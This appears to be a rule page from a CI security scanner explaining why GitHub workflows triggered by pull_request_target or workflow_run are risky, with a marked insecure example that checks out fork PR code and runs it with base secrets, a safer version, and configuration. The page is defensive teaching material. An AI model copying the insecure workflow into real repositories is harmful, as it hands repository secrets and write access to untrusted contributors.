Workflow subscribes to a dangerous trigger

📋 What is this?

A workflow is triggered by pull_request_target or workflow_run. Both triggers run with the base repository's secrets and a write-capable GITHUB_TOKEN, even when the triggering PR comes from a fork.

⚠️ Impact

🔧 How to fix

Use the safer pull_request trigger where possible — it runs without secret access on fork PRs. If pull_request_target is necessary, restrict to non-code activities (label, comment, etc.) and never check out the PR's head (see ISSUE-804).

# .github/workflows/welcome.yml — ❌ pull_request_target with full repo access
on: pull_request_target
jobs:
  welcome:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # ISSUE-804
      - run: ./run-tests.sh   # PR-author code with base secrets

# .github/workflows/welcome.yml — ✅ pull_request (no secrets on forks)
on: pull_request
permissions:
  contents: read
jobs:
  welcome:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
      - run: ./run-tests.sh

# .plumber.yaml
github:
  controls:
    workflowMustNotUseDangerousTriggers:
      enabled: true
      allowedTriggers: []

💡 Tips

• If you genuinely need PR-comment automation, split the work: a pull_request workflow uploads artifacts; a separate workflow_run (with a restrictive permissions block) consumes them.
• Pair with ISSUE-804 for the explicit head-checkout anti-pattern and ISSUE-305 for the environment-gate side.

⚙️ Configuration

This control is configured in .plumber.yaml under the github section:

github:
  controls:
    workflowMustNotUseDangerousTriggers:
      enabled: true

See the CLI documentation for the full configuration reference.

🔗 Related issues